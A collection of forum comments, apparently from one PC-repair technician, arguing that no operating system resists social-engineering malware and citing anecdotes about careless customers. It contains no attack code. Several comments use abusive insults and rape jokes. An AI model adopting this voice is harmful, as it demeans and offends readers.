If you think Linux has a magical immunity you might want to read how to write a Linux virus in 5 easy steps which shows with just a little social engineering it's really not hard to target Linux just as the malware writers target Windows and OSX now. Or did you think Android runs on Windows? In the end if you know what your target is running you can simply shape the payload to target that infrastructure, it's really not that hard to do.
I wonder what they have that the malware guys figured it was worth the expense of such a targeted attack? Perhaps a rival corp wanting to get ahead of the game? It would be interesting to see where this all leads, as you usually don't hear of malware writers going to this much trouble for a single target, so whatever they have must be worth a lot to someone.
-
Re:Problems? Really?
Know what is sad? I won't do it, since you seem to be trying to answer honestly but every. single. answer. you put is actually a TM on TMRepo. That means it's the same lines that have been used so damned often they actually wrote them down with a cute title so you could just paste the numbers. Yet Linux is STILL less than 3%, the numbers say more than I ever could, as will this link that in turn has over 100 links pointing out exactly what I was just saying complete with makes and models.
So either you are magical, able to sprinkle fairy dust onto the machine, or your memory helpfully forgets bullshit. Because frankly the ONLY machine I've EVER seen pass the hairyfeet challenge was a 733MHz Intel box which I promptly threw away because it was too damned old to even get a dollar for. Everything with hardware anybody would want? Or with a decent GPU? Or sound? Crapped all over itself.
In the end "Linux is a replacement for Windows!" is a damned lie, it's a replacement for a Hackintosh which is a MUCH MUCH smaller niche, and like a Hackintosh you damned well better be picky as fuck with the hardware and know damned well about each brand and be ready to do some hacking, something Windows users haven't needed to do in over a decade. In fact if I were to compare Linux to Windows I'd say it's right now barely at Win98 but of course that isn't what you want to hear, but think about it. What was Win98? It was a CLI OS with a bolted on GUI which was a second class citizen that wasn't even required, it was buggy and flaky and CLI was often needed to really get anything done or to fix problems. What is Linux? It is a CLI OS with a bolted on GUI which is a second class citizen that isn't even required, it is buggy and flaky and CLI is often needed to really get anything done or to fix problems.
Oh and I don't know what magical place you live at friend but most B&M stores don't like to take open merch, often charge a restocking fee, and have a set number of returns per year. So using your logic frankly it wouldn't take but 1 or 2 stuck with devices to make Linux equal MORE than the cost of Windows. That is why I personally won't have a Linux machine in my shop, a single broken driver will cost more of my time than a Windows 7 HP OEM. BTW Best Buy, Asus, Walmart, what do these 3 have in common? ALL USED to carry Linux and NONE carry it now, why? Because just as I said the support costs ate any savings by not paying for Windows. I'm sure you haven't used Windows since XP but frankly since Vista the only bugs I've seen have been PEBKAC, and Linux doesn't give you a degree in CompSci by running it, friend. Oh and if you think Linux is immune from bugs? There was an infected Quake 3 in the repos for a year and a half with NOBODY catching it, KDELook handed out infected screensavers for ages with nobody catching on, these are just two off the top of my head. Look at how simple it is to write a Linux bug. As we saw with Android if anybody gave a crap or if Linux had any real numbers there would be just as many Linux bugs as there would be Windows ones, sorry.
-
Re:"Get the Facts"
There are multiple reasons why you don't see Linux desktops getting targeted: 1.- interoperability is shit, the lack of a unified platform that keeps third parties from touching Linux with a 50 foot pole also keeps away malware writers because the best they could score is say...40% of UBUNTU users, but that same attack probably wouldn't work on RHEL without serious tweaking, or on PCLOS, or on Mepis, you get the picture. 2.- Malware writers want powerful machines because the more powerful the machine the more they can remain hidden while cranking out the spam or spreading the bug. Not to slam Linux users but you DO have a shitload of "How to save that PC from the dump" articles which would give an outsider the impression they are more likely to find a P4 than an i7. And 3.- Malware writers are criminals and criminals are notorious for being lazy. They don't want to have to constantly rewrite their bug because something got fiddled with between Ubuntu maniac monkey and nutty narwhal and their shit got broke. With both Windows and Apple having quite clearly labeled life cycles this makes it easy to know how long a bug could be good for.
If you want to see how badly Linux would get pwned if it was on the radar simply look at Android. It has tons of ordinary users, is using the Linux kernel, and has been royally assraped by the malware guys. In the end you simply cannot defeat reality which is thus: ALL Operating Systems are EXTREMELY complex, with literally millions of lines of code all having to interact perfectly and this isn't even counting the third party stuff. Hell I doubt even Linus can tell you with 100% certainty when you launch say network manager every single call it will make and what every interaction is, it's simply too complex. More than 90% of the planet are NOT geeks, hell they don't even come up to the level of a power user of any system, they know just enough to get it to function and that is it, and finally the malware guys figured out long ago it's the USER that is the juiciest target, after all it is they that have the keys to the kingdom so by using social engineering they have become quite adept at getting past the defenses by having their "man/woman on the inside" aka the user, help them achieve their goals.
So it doesn't matter what OS you use, if you practice safe computing you'll be fine, practice stupid computing and you'll be pwned. Those that think the repos are safe might want to look at how long the repos were handing out an infected Quake 3, try a year and a half. If a malware writer truly wants to target Linux there are ways, target some of the software that isn't as heavily monitored or like I said simply target the users and you're in like Flynn.
Now you watch as I get modded down for pointing out reality, to be followed by those that treat Linux as a religion (some call them Freetards, I call them FOSSies because they remind me of Moonies) screaming that it just isn't possible, that Linux's magical goodness could never be tainted by malware crap...hmmm...where did I hear that before? Oh yeah, those that bowed at the altar of Jobs, aka "The Cult of Mac". Wouldn't it be smarter to simply use the best tool for the job and be on your guard? But those that treat tech like ballclubs won't quit rooting for the home team, even when they strike out.
-
Re:And how much is it worth?
Hell you don't even have to give them ANYTHING to have them screw themselves, all you have to do is offer the illusion of giving them something. It's called the dancing bunnies problem and working PC sales and repair I've seen it more times than many here have had hot meals. People will give away their passwords, run ANY program, bypass ANY security, all you have to do is offer the right dancing bunny.
Sadly the only time I had to get ugly with a customer (I threw him out of the shop and told him I'd call the cops if he came back) was a customer that demanded that I repair his machine for free because he refused to listen and destroyed his system for a dancing bunny. Now with my little system I have for Win 7 I have had zero infected machines EXCEPT this guy, and I had told him before I ever sold him the machine when he asked about it "I can't give you that program because it doesn't exist anymore, the feds shut down Limewire years ago and anything that says it's Limewire is just a virus" so what did he do? He Googled "The new Limewire" the very second he got home and when both the AV AND the browser blocked him trying to get it he first uninstalled the browser then when he couldn't disable the AV he uninstalled it, all for the lure of a program that didn't exist. Of course when he ran "the new Limewire" what he got was over 100 malware infections and so many clickjackers that he couldn't even see the desktop for the constant stream of popups. When I finally threw him out of the shop he was yelling "It says right there it's the new Limewire so make it work dammit!"
Linux won't save you, in fact there are websites that show you how to make a bug in 5 easy steps by using the dancing bunny, Mac won't save you either as we saw with DNSChanger and MacDefender/Guardian, in the end security all comes down to the user. Why would the user pay even 10c for their data to be secured when frankly they will hand over the keys to the kingdom for the offer of a dancing bunny? I had to come up with a free porn site just to keep the "Iz-not_Viruz_iz_codex" bugs from infecting guys, I've seen girls run strange programs offered them in chat sessions by strangers because it was supposed to be some match 3 or a "free" version of some popular game like Angry Birds or Plants Vs Zombies, this is why I've had to spend so much time learning how to keep as many decisions OUT of the hands of the user as possible, because frankly the word security never even crosses their minds, not if you offer a dancing bunny.
Hell these websites could put "Not only are we gonna sell your data but we are gonna send a 600 pound silverback over to rape you while we film it for Youtube" and as long as they had some stupid thing to offer the user, some stupid game or chat or like FB a chance to blather on about themselves? They'd happily sign anything you want them to. Hell look at how many FB apps have been coming up with some truly insane demands, post as you, access to ALL of your data AND all the data of any friends, etc, and yet I get idiots I knew in HS and old GFs wanting me to use these crazy apps constantly. When I ask them "Didn't you even read what it requires to use?" they are all "huh? what? but its cool!". Sadly while security takes real work blowing it all to hell takes only one dumbass a few minutes to crap all over it. If ugly is to the bone then dumbass must be to the molecule!
-
Re:Slashdot won't report this
I have to wonder if he is a bot, which I still think mickey incremental UID is. Just like "Mikey" has the same script over and over, the "Use piece of original text + pathetic", so too does this one just copy pasta over and over. Surely a real troll would throw a change up now and then, or change a line or two.
As for TFA before any of the lame "Use Linux" karma whores show up as someone who actually fixes the thing when they get pwned 6 days a week I'd just like to point out that since XP SP2 a lot of the machines getting pwned were PEBKAC and after Vista the vast majority were PEBKAC and with 7 its almost 100% PEBKAC and sadly no OS can magically protect you from stupid people.
Here are the main causes of infections, at least walking into my shop, but talking to other shopkeeps they are seeing the same: 1.- The "you want teh hot lesbos? you need to run our Iz_not_Viruz_iz_codec.exe to play teh vidz!" 2.- The "ZOMG you got teh viruz! To fix run our Iz_not_Viruz_iz_cleanerz.exe to get rid of it ZOMG!" 3.- The "Use the new Limewire (Iz_not_Viruz_iz_Limewirez) to download teh latest Titney_Spearz.mp3.exe tunez today!" and 4.- "Hey my BFF sent me a funny cat video in chat! It says I should run Iz_not_Viruz_iz_LOLCatz to see teh kittiez!"
Notice how in ALL of the above you don't need an exploit, and in fact you could replace .exe with .sh and pwn a Linux machine just as easily? Before anyone says "they'd need root!" you need that with Windows now too remember? The users happily give it root because they want the cookie, or the porn, or the silly cat video. As both the hardware and software get better with security with features like ASLR, DEP, low rights mode browsing by default, etc the malware guys figured out the best way to beat security is....don't bother, just let the moron behind the desk do it FOR you. And as we saw with MacDefender and the KDELook bug it really doesn't matter what OS, as long as you offer the right cookie. For those that don't live in perception bubbles allow me to offer you "How to write a Linux virus" Part 1 and Part 2 which actually explain better than I can basic social engineering tricks that work just about anywhere. Now working with customers since before there even WAS a Windows or Linux I've realized that it's pretty much impossible to make a hack proof OS that is useful to the masses. I can make it harder, much harder to pwn, by putting Comodo CIS or Avast Free along with switching them to a low rights mode browser like Chromium or Dragon, I can even make it easier to recover if they think they made a boo boo by installing Comodo Time Machine in its own hidden partition, but in the end the simple fact is if the user has install rights you are at the mercy of the user and whether or not they have taken a stupid pill today, full stop. And believe me folks there are some doozies out there, I had to order one guy out of my shop and threaten to call the cops because he kept demanding I fix that new machine I just sold him for free since it was pwned in less than 24 hours. How did that happen? Did I miss something?
Nope, after I told him flat footed that Limewire was shut down by the feds years ago and anything that said it was Limewire was a virus he promptly went home, got on the web, and when the AV refused to let him install "the new Limewire" he promptly first tried to disable and then uninstalled said AV, then was shocked, shocked I tell you! that he ended up with 100+ pieces of malware. His argument was "It says right there that there is a new Limewire so dammit you should make it work!"
So remember folks when you hear all these woogy boogy "here is a bug" stories that there are tons of folks that have been running for ages and in fact will have a machine go through its entire life cycle without so much as adware and that these guys have figured out there are literally hundreds of thousands like my
-
Re:GF
So in other words your answer is "Linux is magical and never gets bugs so don't update it" correct? Care to explain these my friend? Protip: NO OS is secure without being patched, NONE. I'd also point out the KDELook bug of year before last, oh and here is a nice little how-to for writing Linux bugs.
But thank you for posting, yours is a PERFECT example of why Linux on the desktop is as dead as disco. When the myriad of problems are pointed out the community simply sticks their fingers in their ears and goes "La la la, CLI is leet! You don't know, you are noob, you are not leet! You must be a M$ Ninja dirty poo poo head!". Would you like me to link to the OEMs that have abandoned Linux, including Asus which started the whole netbook craze? Just ask and it's yours, maybe you can explain how the ENTIRE PLANET is wrong and you're right.
-
Re:High-end models?
I don't want a smartphone at all, apparently they are quite dangerous
-
Re:Easy?
If they have to do all of that? It's pointless, there are easier ways to pwn a machine. For Windows it's as easy as "ZOMG! You got teh viruz! Run 'Iz_Not_Viruz_iz_Cleaner.exe' to kill it ZOMG!" or "U want teh tittez and lezbos? We got teh tittez and lezbos and so can u! Just run 'Iz_Not_Bug_iz_Codec.exe' and enjoy all teh tittez and lezbos today!" and for Linux the social engineering is a little different but the idea is the same and the end result is a pwned machine, see the KDE screensaver malware that went around a couple of years back, or the infected Q III Arena code that actually was sitting on one of the repos being passed out for quite a while before it got caught.
In the end it would simply be easier to get the user to help pwn the machine FOR you than jump through this many hoops. Hell between social engineering, adobe products, and "JavaScript malware o' the day" there are now more than ever far easier ways to make a machine yours than deal with THIS much hoop jumping, it simply wouldn't be worth the effort if you can't somehow automate it.
-
Re:Here We Go Again ...
Uhhh...tell me how EXACTLY telling the equivalent of "water is wet" is a MSFT propaganda piece? You sir might want to read this article on OSNews by the title of OS X - Safe, Yet Horribly Insecure, or is OSNews MSFT propaganda? It points out the Apple implementations of several technologies, when it has them, simply aren't up to snuff. Technologies such as DEP and ASLR either are not implemented or are implemented poorly.
Now Apple was able to get away with that with relative impunity simply because they weren't worth the effort as malware writers like most criminals are a lazy sort of creature and will ALWAYS go for the biggest bang for the least work. It is like that old saying, you rob banks because that is where the money is. You attack Windows because it has been trivially easy to get little Suzy to run your "LOL_Kittehs.screensaver.exe" trojan nasty.
Is this REALLY so surprising? It isn't like any of the other OSes have held up very well when being targeted either. On OSX you had MacDefender followed by MacGuardian which caused Apple to give their infamous order to the Applecare guys "Do NOT say the word Malware and do NOT help those....people!" and on the Linux side we've seen Android pounded pretty regularly as well as the KDELook screensaver bug someone put out for shits and giggles a while back, as well as this article that shows how trivial it is to infect Linux if you get the user to help you which is how nearly all modern nasties spread nowadays.
So why hasn't Linux and OSX been pounded before now? It ain't brain surgery folks, it is because it just wasn't worth the effort for sub double digit userbases. And before some Linux fanboi trots out the old "but but but...Linux is used on servers!" I would point out you don't see Linux admins running "LOL_Kitteh.Screensaver.py" and if you do they should be given a nice white jacket and placed somewhere where they can't hurt anyone. We are talking DESKTOPS, not servers, routers, your toaster, or your remote controlled Linux thermostat. DESKTOPS are where the money is at for malware writers, because they have nice fat broadband connections they don't monitor for shit, they are MUCH more likely to be clueless about best security practices, much more likely to run funny software from the net if you wave a cookie in front of them, etc. It is simply easy money whereas grizzled non-sociable Linux admins don't play that.
So saying Windows is targeted because that is where the money is at is no different than saying the sky is blue and water is wet. If you want an easy target grandma on WinXP is about as easy as you can get. To their credit someone at MSFT FINALLY got hit with the clue stick and the whole "Hey let's all run as admins!" bullshit finally died with Vista, and now that I've switched the majority of my customers and family to Windows 7 I've seen infection rates go waaaaaay down. Did I magically give them a brain transplant? Did my years of bashing my head against the wall trying to teach them best security practices FINALLY get through their heads? Oh hell no! It is the fact MSFT makes the default a regular user now and has tech like ASLR, DEP, file and registry virtualization, and you can even do as I did and add SEHOP from Server 2K8 to Windows 7 to lock it down even tighter. This with a good sandboxing AV like Comodo or Avast Free and we finally have a decent OS that is pretty locked down.
Now that Windows will be getting harder as XP is replaced by 7 it will be OSX's turn to start to worry. Apple being hip has gotten through to some who saw after MacDefender there is money there, and like blood in the water to sharks they WILL come.
-
Re:water still wet
Next time someone tells you "Linux can't get bugs!" you just point them to this page which gives you how to write a Linux virus in 5 easy steps using plain old fashioned social engineering, the same stuff that I can confirm from my years of working repair is how the vast majority of Windows PCs get pwned.
It is actually extremely simple and logical if fanbois would only take a minute to think, instead of waving their Tux flags or iFlags or WinFlags...ALL OSes are extremely complex layers of code where even Torvalds himself can't tell you with 100% certainty what happens step by step when you launch a user mode application and then on top of all this complexity you add third party code and finally add the weakest link, the user him/herself and what do you get? Why a pwned machine of course!
All you can do is use defense in depth, use best security practices, and have frequent backups so that if the user bypasses all your defenses so they can have the "LOL Kitteh!" screensaver with a trojan onboard you're ready to clean it up. I'd argue OOTB Win 7 is more secure than Linux or OSX, simply because MSFT learned from previous mistakes and now you have UAC, ASLR, DEP, etc, etc. As you said SELinux or AppArmor would give the same protection but quickly become a royal PITA and you'll likely run into programs hanging like you do when trying to run XP as non admin.
-
Re:I wonder if the $250,000 reward
Did you miss the earlier article on how Apple got iOS rooted in a single day? Or maybe the KDELook malware that went around a couple of years back? How about how to write a Linux virus in 5 easy steps?
Protip: ALL OSes can and WILL be pwned simply because they are extremely complex interacting systems and nobody, not even Torvalds and the heads of Apple and MSFT engineering can tell you EXACTLY what every possible interaction with each subsystem will output simply because our computers do more than ever before with multicores, GPUs made up of dozens to hundreds of stream processors, and tons of third party code running on top of it all.
As someone who fixes infected PCs 6 days a week and just got done cleaning out another security tool variant let me give you this observation from experience on where most of the malware gets into the PC...PEBKAC. The big attack vectors I'm seeing day after day, in no particular order, are: 1.- The "you want teh hot lesbos? you need to run our Iz_not_Viruz_iz_codec.exe to play teh vidz!" 2.- The "ZOMG you got teh viruz! To fix run our Iz_not_Viruz_iz_cleanerz.exe to get rid of it ZOMG!" 3.- The "Use the new Limewire (Iz_not_Viruz_iz_Limewirez) to download teh latest Titney_Spearz.mp3.exe tunez today!" and 4.- "Hey my BFF sent me a funny cat video! It says I should run Iz_not_Viruz_iz_LOLCatz to see teh kittiez!"
As you will notice with ALL of the above you simply don't have to bother with an exploit for ANY of those, as the user IS the exploit and is the weakest link. The last major "WTF?" that MSFT had, the "Hey let's run everybody as admin!" officially died with Vista and since 7 doesn't bug the crap out of folks with "Cancel/allow?" boxes every three seconds UAC has been left on and along with low rights mode in IE and Chromium-based is doing a good job, as we saw by the numbers released the other week where there are only 4 per 1000 7 machines infected vs 14 for XP.
But as long as you have people willing to ignore or even turn off their AV (as I had the other week with a customer and the "Iz_Not_Bug_Iz_Limewire") because a malware writer waved a cookie in front of them then frankly I don't see what else can be done besides what MSFT is already doing with the free MSRT and MSE. And as we have seen with first MacDefender and now MacGuard (which doesn't even need the password anymore) on OSX and the nasty Android trojan apps it doesn't matter whether you are on an alternative OS or not, all that matters is whether or not the bad guys want in bad enough to do the work and whether you have any users who'll run "Iz_Not_Bug_Iz" style apps. Sadly I've found that WAAAY too many are more than happy to do just that. Will this bounty crap work? Who knows, I think the money would be better served paying researchers to tear the botnet's guts apart and trace their way back, but they say there is no honor among thieves.
And I apologize about the length, I just find it incredibly ridiculous that anyone still believes ANY company, be it Apple, Google, or MSFT, can wave a magic wand and make PEBKAC disappear. There have been attempts at education (MSFT puts out plenty of warnings about email attachments and other major attack vectors); there have been attempts to lock the user away from anything bad (Apple) and using Linux to stop malware (Google with Android) and ALL HAVE FAILED. All you can do is cut down the risks as best you can and be ready to clean up the mess when Forrest Gump ignores you to "see teh tittiez!"
-
Re:Masses reaction
Think OSX is immune? Read TFA. Think Linux can't be pwned? Look at the Android malware or the KDE screensaver malware that spread awhile back or even this handy how to guide on writing Linux malware.
Still bringing that one up hairyfeet? Isn't it the case that the desktop launcher vector was shut down a long, long time ago? While the article you reference is dated 11-Feb-2009 and so can be excused, it's now 2011, the vector doesn't work, and so isn't relevant here. As I asked last time, time to update your bag.
So in the end it doesn't matter what the OS, it doesn't matter what kind of permissions model you set up, if you have someone with admin rights that says "I want my emails from Melissa and you WILL let me have them!" then no matter what OS, you're screwed. An OS is only as good as the PEBKAC sitting in front of it.
Computers are here for users, not users are here for computers. Given that, we obviously can't completely remove the PEBCAK aspect of computer security. So as you note, all OSes have the PEBCAK chink in their armor to a degree, but that doesn't mean because end users can be foolish we should accept easily compromisable OSes.
If an OS has a problem with drive-bys then that's bad. When I hear of OSX being hit hard by them, I'll then consider it as being closer to the Windows security threat level.
-
Re:Masses reaction
Actually, and I'll probably get flamed for saying this, you'd be surprised how many have bought the "you just can't infect a Mac!" meme. I got called into an SMB a few years back, where the guy instead of listening to me and paying me to set up a sensible top to bottom least permission approach bought into the "can't infect a Mac!" meme and then was shocked! shocked I tell you, when he found out he got pwned thanks to one of his kids wanting to watch a naughty video and getting the DNS changer bug.
You see the problem is something we that have been in the trenches for quite a while (I started with Win 3.x, what was that? 20 years ago?) sadly run into far too often, it is what I like to call "magical thinking". It is the "If I use product X I won't have to change my habits or anything, and I'll be unhackable" bullshit. Hell I remember when firewall resellers were pushing the "if you have a firewall you are invisible and untouchable!" and it was bullshit then and it is bullshit now.
NEWS FLASH...ALL OSes can be hacked, full stop. ALL OSes are extremely complex pieces of code, with interactions on top of interactions with third party code thrown in the mix just for shits and giggles. There is NO perfectly unhackable OS and if there was one that person could hire Bill Gates to shine his shoes. The last real legitimate gripe about Windows, the brain dead "hey let's run everyone as admin!" finally died hard with Vista, so frankly all OSes are on about the same footing, as in TFA it all comes down to what the malware writer thinks is profitable.
Think OSX is immune? Read TFA. Think Linux can't be pwned? Look at the Android malware or the KDE screensaver malware that spread awhile back or even this handy how to guide on writing Linux malware.
The ONLY solution is a top to bottom least permissions approach, not magical thinking. Least permissions and users not being so brain dead they actively help the malware writer is the ONLY solution.
As a final note let me give a recent example. I set up a box, had it locked down nicely, required password for admin, least permissions, yet it got pwned in under 45 days. Did I miss something? Nope, the user decided he just had to have Limewire, even though I told him not to, so he disabled the antivirus because it wouldn't in his words "shut up" and then promptly gave permissions to Limewire to do whatever it wanted. And boy did it, 60+ pieces of malware.
So in the end it doesn't matter what the OS, it doesn't matter what kind of permissions model you set up, if you have someone with admin rights that says "I want my emails from Melissa and you WILL let me have them!" then no matter what OS, you're screwed. An OS is only as good as the PEBKAC sitting in front of it.
-
Re:News?
Actually I'd say the problem isn't Windows, it is PEBKAC which NO OS will solve or they would have done so by now. I just got finished cleaning one of these scareware infections where the user uninstalled their working AV to install the malware. Now why would they do that you say? Simple, they saw the number of "infections" reported on the fake scareware page and decided their good AV must not be working (since it wasn't reporting the non existent viruses) and therefore "must have gone bad" like cheese in the fridge and tossed it to install the malware.
Now show me ANY OS that would protect the system from that level of stupid, I dare you. You can't because idiot proofing will always be defeated by the bigger idiot. For Linux here is a nice trick, how to write a Linux virus in 5 easy steps that uses nothing but bog standard social engineering. Hell, it doesn't even need root to be able to do all the things your average malware writer wants to accomplish. And we know this works because they used similar methods in the KDELook attack, where thousands of KDE users were infected by fake screensavers that were actually malware. Sound familiar?
So it is real simple folks, if the user has install rights then they have the ability to screw themselves, full stop. You can try education, making them jump through hoops like UAC or root prompts, it doesn't matter. It is the classic dancing bunnies problem where if the user WANTS the malware (and that is what it all boils down to, the malware uses fear or social engineering to convince the user they want to install the malware, a classic con game) then by God they're gonna get that malware whether you like it or not!
So in the end you do what you can, make sure they have a backup solution, and be ready to clean up the messes when they happen. It reminds me of how an old Linux admin of mine ended up being threatened with firing and had to show up before the head of the regional office because the PHB over him was demanding he allow the PHB's emails from Melissa without interference. In the end there is only so much you can do, you just can't knock the stupid out of some folks.
-
Re:Mac, Linux, Android and Solaris.
Exactly and I would argue the next big malware attacks most likely will simply ignore trying to get root as new features like ASLR and DEP make it harder to use the old tricks like buffer overflows.
And the simple fact is to do most of the stuff your average malware writers want to do (send spam, steal data, etc) it isn't even needed. See this example of how to write a Linux virus in 5 easy steps with no need for root, just good old social engineering like we see every day, and it will autorun, send spam, do anything the malware writer wants to do.
So I would argue the reason we saw so many viruses running as root before was because it was easy to obtain root and now that that is not the case malware in the future simply won't bother and will instead do its damage from userland.
-
Re:Virus Control Improvements
Look, you want to see me blow through your famous Linux security like shit through a goose? Well here you go tada! Using the exact same tricks as they use on Windows and as simple as opening an email attachment (sound familiar?) I can royally fuck your Linux OS. Send spam, alter files, set myself up to autostart. Gee, doesn't this sound like Windows?
The ONLY reason you don't see malware writers using this trick (which BTW they have in the past, look up "KDE theme virus" to see for yourself) is because you have to have basic computer and problem solving skills because Linux is a PITA as a desktop so you have to know how to trawl forums for fixes, use CLI to install and fix driver issues, etc. The fact that you have to have at least a basic understanding of Linux (or have an admin with said knowledge) means the odds of getting enough infections to be worth the work is rather slim.
To use an old quote you rob banks because that is where the money is and if you want to build a 200,000 strong botnet you don't go to the OS that has less than the margin for error marketshare to start and with more geeks and CS grads than Sally Clueless users to boot. It is simple numbers my friend, or are you one of those that says the reason Macs with the vaunted BSD security fall first on pwn2own is that people would risk losing a $10,000 prize just to win a $2300 Macbook?
The ONLY reason Linux isn't an infected mess is that social engineering, like I pointed out above, which works 100% on Linux, needs clueless users to work and there are fewer of those to go around. I'd say wait until you get the numbers but with all the infighting and factionalism of the community I doubt you'll get past 4% anyway, sorry. But as Android gets popular and drags in the clueless you WILL see more infections, mark my words. If the target is juicy the malware writers WILL hit it and despite all the "Linux runs the web" BS the simple fact is you get better bandwidth for longer by pwning home connections since they don't monitor their connections like server admins do.
-
Re:Celebration
Hi Cosm! Sadly I wish that it was, but as someone who has been in the repair biz since Win3.x it is all too true. Hell, I'll give you a perfect example of why social engineering works: I had a customer with me sitting right exactly there telling her specifically "Do NOT open that password protected zip and run it, it is a virus!" and got told "Oh you're just paranoid, see the name? My BFF Kim sent this to me! Kim wouldn't do that!" and so she ignored me AND the AV which was practically trying to hurl itself between her and the bug and did EXACTLY what I told her not to and promptly pwned her own machine.
So sadly my friend I can state with 100% certainty it is NOT a myth or old wives tale, it is all too real. Look up the top 10 list of malware by installation and then look to see how they infect and you'll find a good 8 out of 10 if not 10 out of 10 rely on the user to pwn themselves by ignoring best practices, ignoring the EULA, never reading anything, and just blindly clicking next to continue.
The latest nasty going around is the "Security tool" variant which is installed on MILLIONS of machines and which I see at least 3 times a week, all done using the "ZOMG! u got teh bugz! Install 'is_not-viruz.exe' to kill it ZOMG!" and that damned thing is installed on millions of PCs using that lame BS tactic. No shit. Sad but true my friend, sad but true. And Linux security wouldn't do a damned thing, in fact here is How to write a Linux virus in 5 easy steps using the same tricks and it WILL work because so many refuse to think.
-
Re:Bank, please explain me once again...
Allow me to show you what would happen if banks switched to requiring Ubuntu tomorrow, I give you how to write a Linux virus in just 5 easy steps tada! You just got pwned!
It really is simple: Windows gets hit because that is where the easy marks are and if you switch everyone over tomorrow then by default you bring the easy marks to Linux and the famous Linux security gets turned to crapola 3 minutes later.
As a PC repairman I see the nasties that hit Windows every day, you know what the biggest two are BY FAR? The "ZOMG You got teh Viruz! Run "this_iz_not_a_viruz.exe" to kill it quick! ZOMG!" and the ever popular "Enjoy free (insert new movies, music, porn) all you want just by installing our "this_is_not_a_viruz_codec.exe" today!" Now how in any way shape or form will Linux protect the user from social engineering attacks or from running outdated third party software like Flash or Reader? Gonna hold a gun to their head and force them to update? Hell Windows has had automatic updates for over a decade yet I still see XP SP2 machines cross my desk.
The simple facts are these: as long as the user has the right to install software he also has the right to royally screw the pooch when it comes to malware. Linux by default, because it is more "fiddly" and because one has to do step by step troubleshooting with it (go to forum, find relevant topic, launch bash, apply fix), has users that know more about their OS internals and are more security minded. It ain't rocket science folks. Windows got rid of the last legitimate complaint, forcing users to run as admins, more than 3 years ago. But as long as the majority of home and business users have no clue how anything works you are gonna see bugs on whatever OS is dominant because that is where the clueless are. Just look at how we are seeing more malware for Android now that it is becoming popular. With the users come the malware, simple as that. And switching to Linux won't magically give the user a level up in IT knowledge.
-
Re:XP now more secure than Linux?
Well that and the fact that there are some seriously stupid users on Windows. Believe me I know, she opened and ran a password protected zip file with me sitting right exactly there and telling her "What are you doing? Don't open that! It's a virus!" and I got "It's from my BFF Kim, and she wouldn't do that! Stop being so paranoid." and then promptly infected the living hell out of her machine.
So Linux guys, be happy where you are. Drop to your knees and thank RMS that Linux is still CLI heavy in Ubuntu if anything goes wrong, and the whole Linux setup seems "too hard" for the average Windows user. Be glad, oh dear Lord be glad. Because if you ever manage to lure them over the malware writers will be right behind them and your pretty OS will be turned into a giant festering turd. Because users like that will happily run "Happy_Puppy.sh" or "Hot_Porn.py" and follow the nice instructions the virus writers hand them.
Hell you can write a Linux virus in 5 easy steps just by using the social engineering that I see every damned day on Windows. With those kinds of users all the fancy security in the world is worthless, because they are more than happy to follow instructions if they think they get a goodie at the end...shudder...
So while I'm glad that MSFT killed autorun frankly I can't remember the last time I saw it used as an attack vector on a PC I had to work on. Nowadays it is usually the "ZOMG! U got teh Viruz! Run this "Viruzkillz.exe" to kill it!!!" Or the classic "Having trouble viewing the free porn? Just run the "Supercodec.exe" to get all the free action right now!!!". Man they fall for those two every time.
-
Re:The real issue:
I'm sorry but that is bullshit. I have to deal with those users 6 days a week and frankly as long as they have control over their box they WILL do whatever they please, security be damned. It is the classic dancing bunnies problem and I don't care which OS you use they WILL blow right through your security measures if they want to see the bunny.
I have had a customer open a password protected zip file with me standing there telling them it's a virus "because this was sent to me by my BFF Kim and she wouldn't do that" and if you think Linux or any other OS would do better allow me to submit for your consideration How to write a Linux virus in 5 easy steps using the same social engineering which causes the vast majority of infections on Windows.
Bottom line if the user wants to run it they WILL run it, and the only way to prevent that would be to take away ALL rights to the machine and make it into trusted computing. Now since trusted computing (or treacherous computing as RMS calls it) would take away all rights from the user and kill OSes that allowed the four freedoms dead we simply have to accept the fact that stupid is as stupid does.
Not to say adding security isn't a good idea, I'm personally switching my customers and family to Windows 7 and the file and registry virtualization along with low rights mode in Chromium does safeguard against things that don't require user action like JavaScript exploits and drive-bys, but frankly nothing will stop the user actively installing malware if they are so inclined. And I can tell you that at my shop I'd say probably 85%+ of the malware on PCs is installed by the user themselves, either by using social engineering or by offering the user something they desire, such as free porn or software. All the security in the world isn't gonna help if the source of the infection is PEBKAC.
-
Re:Thank God....
Before you break your arm patting yourself on the back congratulating yourself on your super security you might want to read this which shows how to write a Linux virus in just 5 easy steps that will be just as nasty as a Windows bug and then maybe you'll remember the problem isn't Windows but PEBKAC.
I should know I fix the things 6 days a week and I'd say that more than 90% of the bugs that cross my desk were installed by the user either through scare tactics or through the promise of porn or free stuff. I'd say a good 80% of the rest were infected by outdated third party software like Java, Flash and Reader which frankly nobody ever updates. The "your flash is out of date! Run 'pwnme.exe' to get the latest version!" is quite popular at the moment, as well as "ZOMG! U got teh Viruz! Run 'Viruzfker.exe' to kill the ZOMG Viruz quick!!".
So in conclusion before the smugness chokes us out here let me say this: You better drop to your knees and thank Linus and RMS that Linux isn't popular because if you got the huge teeming masses of unwashed rabble onto your OS it would come falling down like a house of cards by...oh I'd say 3:45PM tomorrow. Faster than you can say "Oh shit!" there would be emails with "free_titties.sh" and "Happy_Puppies_screensaver.py" with nice little instructions that the user would follow without thought and your precious security would be so much Swiss Cheese.
It is the classic dancing bunnies problem and if anyone could solve it they would be richer than Gates. I have seen an AV practically throw itself in front of a user trying to stop them only to have them completely disable it because the malware offered something they wanted. Linux won't protect from that level of stupidity sorry. Hell you can't even blame it on Windows running as admin anymore since both Vista and 7 don't allow the user to run as admin but instead use the Linux model of only elevating for install yet the users put in their password and install the bugs anyway no matter how much the AV and OS tries to do to stop them.
TLDR you can't solve social engineering with tech, just as you can't solve 419 email scams with filters. Stupid is as stupid does Forrest, stupid is as stupid does.